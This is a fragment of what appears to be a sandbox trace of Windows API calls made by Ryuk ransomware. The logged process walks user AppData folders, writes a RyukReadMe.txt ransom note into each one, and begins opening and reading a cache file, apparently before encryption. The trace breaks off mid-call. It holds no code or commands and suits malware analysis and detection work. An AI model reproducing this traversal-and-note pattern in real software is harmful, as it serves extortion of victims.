GetLastError () returned 0x0 [0144.112] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0144.113] CloseHandle (hObject=0x19c) returned 1 [0144.113] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0144.113] SetLastError (dwErrCode=0x0) [0144.113] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.113] GetLastError () returned 0xb7 [0144.113] CloseHandle (hObject=0x19c) returned 1 [0144.113] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0144.113] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0144.113] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0144.113] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0144.113] SetLastError (dwErrCode=0x0) [0144.113] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\eng\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.114] GetLastError () returned 0x0 [0144.114] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0144.114] CloseHandle (hObject=0x19c) returned 1 [0144.114] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0144.114] SetLastError (dwErrCode=0x0) [0144.114] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.115] GetLastError () returned 0xb7 [0144.115] CloseHandle (hObject=0x19c) returned 1 [0144.115] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0144.115] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0144.115] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0144.115] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0144.115] SetLastError (dwErrCode=0x0) [0144.115] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\frn\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.115] GetLastError () returned 0x0 [0144.115] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0144.116] CloseHandle (hObject=0x19c) returned 1 [0144.116] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0144.116] SetLastError (dwErrCode=0x0) [0144.116] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.116] GetLastError () returned 0xb7 [0144.116] CloseHandle (hObject=0x19c) returned 1 [0144.116] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0144.116] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0144.116] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0144.117] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0144.117] SetLastError (dwErrCode=0x0) [0144.117] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\grm\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.117] GetLastError () returned 0x0 [0144.117] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0144.118] CloseHandle (hObject=0x19c) returned 1 [0144.118] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0144.118] SetLastError (dwErrCode=0x0) [0144.118] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.118] GetLastError () returned 0xb7 [0144.118] CloseHandle (hObject=0x19c) returned 1 [0144.119] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0144.119] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0144.119] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0144.119] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0144.119] SetLastError (dwErrCode=0x0) [0144.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\itl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.119] GetLastError () returned 0x0 [0144.119] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0144.120] CloseHandle (hObject=0x19c) returned 1 [0144.120] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0144.120] SetLastError (dwErrCode=0x0) [0144.120] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.120] GetLastError () returned 0xb7 [0144.120] CloseHandle (hObject=0x19c) returned 1 [0144.120] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0144.120] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0144.120] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0144.120] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0144.120] SetLastError (dwErrCode=0x0) [0144.120] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\nrw\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.121] GetLastError () returned 0x0 [0144.121] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0144.121] CloseHandle (hObject=0x19c) returned 1 [0144.122] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0144.122] SetLastError (dwErrCode=0x0) [0144.122] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.122] GetLastError () returned 0xb7 [0144.122] CloseHandle (hObject=0x19c) returned 1 [0144.122] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0144.122] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0144.122] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0144.122] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0144.122] SetLastError (dwErrCode=0x0) [0144.122] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\prt\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.122] GetLastError () returned 0x0 [0144.122] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0144.123] CloseHandle (hObject=0x19c) returned 1 [0144.123] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0144.123] SetLastError (dwErrCode=0x0) [0144.123] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.123] GetLastError () returned 0xb7 [0144.123] CloseHandle (hObject=0x19c) returned 1 [0144.123] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0144.124] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0144.124] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0144.124] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0144.125] SetLastError (dwErrCode=0x0) [0144.125] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\spn\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.125] GetLastError () returned 0x0 [0144.125] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0144.126] CloseHandle (hObject=0x19c) returned 1 [0144.126] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0144.126] SetLastError (dwErrCode=0x0) [0144.126] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.126] GetLastError () returned 0xb7 [0144.126] CloseHandle (hObject=0x19c) returned 1 [0144.126] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0144.126] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0144.127] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0144.127] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0144.127] SetLastError (dwErrCode=0x0) [0144.127] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\swd\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.127] GetLastError () returned 0x0 [0144.127] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0144.135] CloseHandle (hObject=0x19c) returned 1 [0144.135] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0144.135] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0144.135] SetLastError (dwErrCode=0x0) [0144.135] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.136] GetLastError () returned 0xb7 [0144.136] CloseHandle (hObject=0x198) returned 1 [0144.136] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0144.136] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0144.136] SetLastError (dwErrCode=0x0) [0144.136] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0144.136] GetLastError () returned 0xb7 [0144.136] CloseHandle (hObject=0x194) returned 1 [0144.136] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0144.136] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0144.136] SetLastError (dwErrCode=0x0) [0144.136] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0144.136] GetLastError () returned 0xb7 [0144.136] CloseHandle (hObject=0x190) returned 1 [0144.136] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0144.136] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0144.136] SetLastError (dwErrCode=0x0) [0144.136] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0144.137] GetLastError () returned 0xb7 [0144.137] CloseHandle (hObject=0x18c) returned 1 [0144.137] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0144.137] SetLastError (dwErrCode=0x0) [0144.137] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0144.137] GetLastError () returned 0xb7 [0144.137] CloseHandle (hObject=0x18c) returned 1 [0144.137] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0144.137] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0144.137] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0144.137] SetLastError (dwErrCode=0x0) [0144.137] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0144.137] GetLastError () returned 0x0 [0144.137] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0144.138] CloseHandle (hObject=0x190) returned 1 [0144.138] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0144.138] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0144.138] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0144.138] SetLastError (dwErrCode=0x0) [0144.138] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0144.139] GetLastError () returned 0x0 [0144.139] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0144.139] CloseHandle (hObject=0x194) returned 1 [0144.140] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0144.140] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.140] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.140] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.140] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", dwFileAttributes=0x80) returned 1 [0144.141] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.141] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=471) returned 1 [0144.141] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=471) returned 1 [0144.141] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xb5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.141] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.142] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 